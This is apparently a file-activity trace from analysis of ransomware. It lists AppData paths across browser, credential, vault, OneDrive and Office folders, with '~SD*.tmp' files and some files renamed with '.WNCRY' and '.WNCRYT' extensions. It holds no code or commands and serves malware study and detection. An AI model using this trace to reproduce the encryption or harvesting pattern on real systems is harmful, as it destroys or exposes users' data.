C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\~SDD2CB.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\~SDD2EC.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\DesktopSharingHub\~SDD32B.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies\~SDD37A.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded\~SDD3AA.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\~SDD3EA.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\~SDD41A.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\hyphen-data\~SDD459.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload\~SDD489.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\~SDD4C8.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\OptimizationHints\~SDD4F8.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials\~SDD4F9.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\PKIMetadata\~SDD4FA.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl\~SDD4FB.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved\~SDD4FC.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\~SDD50D.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips\~SDD50E.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\~SDD54D.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\~SDD55E.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\~SDD57E.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\~SDD59F.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\SwReporter\~SDD5BF.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\~SDD5EF.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\UrlParamClassifications\~SDD61F.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\WidevineCdm\~SDD65E.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\~SDD69E.tmp
C:\Users\user\AppData\Local\Microsoft\~SDD6DD.tmp
C:\Users\user\AppData\Local\Microsoft\Credentials\~SDD70D.tmp
C:\Users\user\AppData\Local\Microsoft\Device Metadata\~SDD73D.tmp
C:\Users\user\AppData\Local\Microsoft\Device Metadata\dmrccache\~SDD77C.tmp
C:\Users\user\AppData\Local\Microsoft\Device Metadata\dmrccache\downloads\~SDD78D.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\~SDD7AD.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\~SDD7CD.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\~SDD7EE.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\~SDD81E.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\~SDD87C.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\~SDD8BC.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\~SDD90B.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase\~SDD979.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\~SDD9D8.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\6af35b70-7d44-4f46-9acd-3b4fa9cd6081\~SDDA27.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase\~SDDA67.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\~SDDAA6.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\~SDDAA7.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\~SDDAC7.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\~SDDAD8.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\~SDDAE9.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir\~SDDAF9.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\~SDDB1A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokens\~SDDB2A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\~SDDB2B.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\~SDDB3C.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\AvailabilityDB\~SDDB8B.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\EventDB\~SDDBDA.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\~SDDC29.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\JumpListIconsRecentClosed\~SDDC49.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\~SDDC5A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\~SDDC9A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\~SDDCD9.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\~SDDCF9.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Platform Notifications\~SDDD39.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\~SDDD59.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\~SDDDB8.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\~SDDE07.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\~SDDE56.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\~SDDE76.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\~SDDEA6.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\~SDDEE6.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\~SDDF35.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\~SDDF84.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\~SDDFD3.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\~SDE022.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\~SDE081.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\~SDE0A1.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\~SDE0E1.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\~SDE101.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\~SDE150.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Platform Notifications\~SDE1CE.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\~SDE21D.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\~SDE24D.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\~SDE26D.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FontLookupTableCache\~SDE2BC.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PepperFlash\~SDE2FC.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\~SDE36A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\~SDE39A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\~SDE3DA.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\~SDE3EA.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\~SDE40B.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\~SDE42B.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\~SDE46A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\~SDE4AA.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm\~SDE4DA.tmp
C:\Users\user\AppData\Local\Microsoft\Event Viewer\~SDE529.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds\~SDE578.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds\Feeds for United States~\~SDE5D7.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\~SDE626.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\~SDE646.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\~SDE6B4.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\BD5QM5PR\~SDE6F4.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\S0OSSLWD\~SDE733.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\SQ4TDUZM\~SDE773.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\ZLFI91IZ\~SDE7A3.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\~SDE7D3.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRY
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DomainSuggestions\~SDE822.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\~SDE871.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\3HLJ65W4\~SDE8B0.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\D3CVYKUR\~SDE8D1.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DGF898HW\~SDE8F1.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DRJ7CCJA\~SDE8F2.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieSiteList\~SDE8F3.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieUserList\~SDE932.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EUPP\~SDE982.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\~SDE9E0.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\~SDEA2F.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\l51tpzc\~SDEA40.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\rs8lb9c\~SDEA60.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\~SDEABF.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\~SDEAFF.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\~SDEB2E.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\~SDEB4F.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\TabRoaming\~SDEB5F.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\~SDEB60.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-2845162440\~SDEB71.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\~SDEB72.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tracking Protection\~SDEB73.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlockManager\~SDEB74.tmp
C:\Users\user\AppData\Local\Microsoft\Media Player\~SDEBB3.tmp
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\~SDEBE3.tmp
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\~SDEBF4.tmp
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000C0CE\~SDEC24.tmp
C:\Users\user\AppData\Local\Microsoft\Media Player\Transcoded Files Cache\~SDEC44.tmp
C:\Users\user\AppData\Local\Microsoft\Office\~SDEC74.tmp
C:\Users\user\AppData\Local\Microsoft\Office\15.0\~SDECB3.tmp
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\~SDED03.tmp
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\~SDED32.tmp
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\binaries.templates.cdn.office.net\~SDED62.tmp
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\cdn.odc.officeapps.live.com\~SDEDD1.tmp
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\office15client.microsoft.com\~SDEDD2.tmp
C:\Users\user\AppData\Local\Microsoft\Office\16.0\~SDEDD3.tmp
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Floodgate\~SDEDD4.tmp
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF\~SDEDD5.tmp
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF\AppCommands\~SDEDE5.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\~SDEDE6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\~SDEDE7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ThirdPartyNotices.txt.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ThirdPartyNotices.txt.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\af\~SDEDF8.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\am-et\~SDEDF9.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\amd64\~SDEDFA.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ar\~SDEDFB.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\as-in\~SDEDFC.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\az-latn-az\~SDEDFD.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\be\~SDEDFE.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bg\~SDEE1E.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bn-bd\~SDEE4E.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bn-in\~SDEE7E.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bs-latn-ba\~SDEECD.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ca\~SDEF3B.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ca-es-valencia\~SDEF6B.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\cs\~SDEFCA.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\cy-gb\~SDEFFA.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\da\~SDF0A7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\de\~SDF0E6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\el\~SDF126.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\en\~SDF156.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\en-gb\~SDF1A5.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\es\~SDF1E4.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\et\~SDF214.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\eu\~SDF273.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fa\~SDF2E1.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fi\~SDF311.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fil-ph\~SDF341.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fr\~SDF361.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ga-ie\~SDF362.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gd\~SDF363.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gd-latn\~SDF364.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gl\~SDF365.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gu\~SDF366.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ha-latn-ng\~SDF377.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\he\~SDF3B6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hi\~SDF3F6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hr\~SDF407.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hu\~SDF446.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hy\~SDF495.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\id\~SDF4C5.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ig-ng\~SDF533.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\imageformats\~SDF5B1.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\~SDF63F.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\is\~SDF68E.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\it\~SDF6DD.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ja\~SDF70D.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ka\~SDF75C.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kk\~SDF79C.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\km-kh\~SDF7DB.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kn\~SDF82A.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ko\~SDF86A.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kok\~SDF8A9.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ku-arab\~SDF8D9.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ky\~SDF8FA.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lb-lu\~SDF939.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lt\~SDF979.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lv\~SDF9A8.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mi-nz\~SDF9D8.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mk\~SDFA37.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ml-in\~SDFA67.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mn\~SDFA97.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mr\~SDFAC7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ms\~SDFAF7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mt-mt\~SDFB26.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nb-no\~SDFB56.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ne-np\~SDFB86.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nl\~SDFBB6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nn-no\~SDFBC7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nso-za\~SDFBE7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\or-in\~SDFC36.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa\~SDFC66.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa-arab\~SDFCB5.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa-arab-pk\~SDFCC6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pl\~SDFCE6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\platforms\~SDFCE7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\prs-af\~SDFCE8.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pt-br\~SDFCE9.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pt-pt\~SDFD28.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\~SDFD68.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\~SDFD88.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\~SDFDE7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\Styles\~SDFE36.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\Styles\Flat\~SDFE85.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls.2\~SDFEC5.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Extras\~SDFF14.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Layouts\~SDFF73.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Templates.2\~SD10.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Window.2\~SD30.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick.2\~SD50.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qut-latn\~SD9F.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\quz-pe\~SDCF.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ro\~SD10F.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ru\~SD11F.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\rw\~SD16F.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\scenegraph\~SD1CD.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sd-arab\~SD1FD.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sd-arab-pk\~SD23D.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\si-lk\~SD27C.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sk\~SD28D.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sl\~SD28E.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sq\~SD28F.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-cyrl-ba\~SD290.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-cyrl-rs\~SD291.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-latn-rs\~SD2FF.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sv\~SD36E.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sw\~SD3BD.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ta\~SD3FC.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\te\~SD47A.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tg\~SD49A.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tg-cyrl\~SD4CA.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\th\~SD558.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ti\~SD5C6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tk-tm\~SD615.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tn-za\~SD645.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tr\~SD6A4.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tt\~SD6F3.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ug\~SD713.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ug-arab\~SD743.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\uk\~SD764.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ur\~SD7A3.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\uz-latn-uz\~SD7E3.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\vi\~SD7F3.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\wo\~SD813.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\xh-za\~SD814.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\yo-ng\~SD854.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zh-cn\~SD874.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zh-tw\~SD885.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zu-za\~SD8A5.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\~SD8B6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\~SD914.tmp
C:\Users\user\AppData\Local\Microsoft\PlayReady\~SD944.tmp
C:\Users\user\AppData\Local\Microsoft\RMSLocalStorage\~SD974.tmp
C:\Users\user\AppData\Local\Microsoft\TaskSchedulerConfig\~SD994.tmp
C:\Users\user\AppData\Local\Microsoft\Vault\~SD9C4.tmp
C:\Users\user\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\~SD9C5.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\~SD9C6.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\1024\~SD9C7.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\1033\~SD9C8.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\AppCache\~SD9C9.tmp
